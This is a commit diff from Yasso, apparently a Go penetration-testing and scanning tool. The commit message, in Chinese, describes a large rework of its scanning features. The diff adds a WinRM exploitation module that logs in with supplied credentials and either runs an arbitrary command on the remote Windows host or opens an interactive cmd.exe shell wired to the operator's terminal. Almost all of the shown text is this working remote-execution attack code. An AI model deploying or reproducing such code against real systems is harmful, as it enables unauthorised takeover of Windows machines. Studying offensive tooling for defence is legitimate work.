Yasso更新大改动，更新扫描方式，去除不常用功能，增加指纹和协议识别，修补bug等

2026-02-13 23:35:17 +08:00 · 2022-05-29 09:11:07 +08:00
parent a6cd80f8e8
commit cb72f18edd
129 changed files with 16619 additions and 6278 deletions
--- a/pkg/exploit/winrm/winrm.go
+++ b/pkg/exploit/winrm/winrm.go
@@ -0,0 +1,62 @@
+package winrm
+
+import (
+	config2 "Yasso/config"
+	"Yasso/core/logger"
+	"Yasso/core/plugin"
+	"Yasso/pkg/exploit/config"
+	"fmt"
+	"github.com/masterzen/winrm"
+	"io"
+	"os"
+	"time"
+)
+
+func ExploitWinRM(exploits config.Exploits, Command string, isShell int) {
+	WinRMConn, status, err := plugin.WinRMAuth(config2.ServiceConn{
+		Hostname: exploits.Hostname,
+		Port:     exploits.Port,
+		Timeout:  1000 * time.Millisecond,
+	}, exploits.User, exploits.Pass)
+
+	if err != nil || status == false {
+		return
+	}
+	switch isShell {
+	case 1:
+		WinRMShell(WinRMConn, Command, false)
+	case 2:
+		WinRMShell(WinRMConn, Command, true)
+	default:
+		logger.Fatal("not found exploit method")
+		return
+	}
+}
+
+func WinRMShell(client *winrm.Client, Command string, shell bool) {
+	if shell == true {
+		shell, err := client.CreateShell()
+		if err != nil {
+			logger.Fatal(fmt.Sprintf("create shell failed %v", err))
+			return
+		}
+		var cmd *winrm.Command
+		cmd, err = shell.Execute("cmd.exe")
+		if err != nil {
+			logger.Fatal(fmt.Sprintf("[!] create shell failed %v", err))
+			return
+		}
+
+		go io.Copy(cmd.Stdin, os.Stdin)
+		go io.Copy(os.Stdout, cmd.Stdout)
+		go io.Copy(os.Stderr, cmd.Stderr)
+		cmd.Wait()
+		shell.Close()
+	} else {
+		_, err := client.Run(Command, os.Stdout, os.Stderr)
+		if err != nil {
+			logger.Fatal(fmt.Sprintf("[!] Execute Command failed %v", err))
+			return
+		}
+	}
+}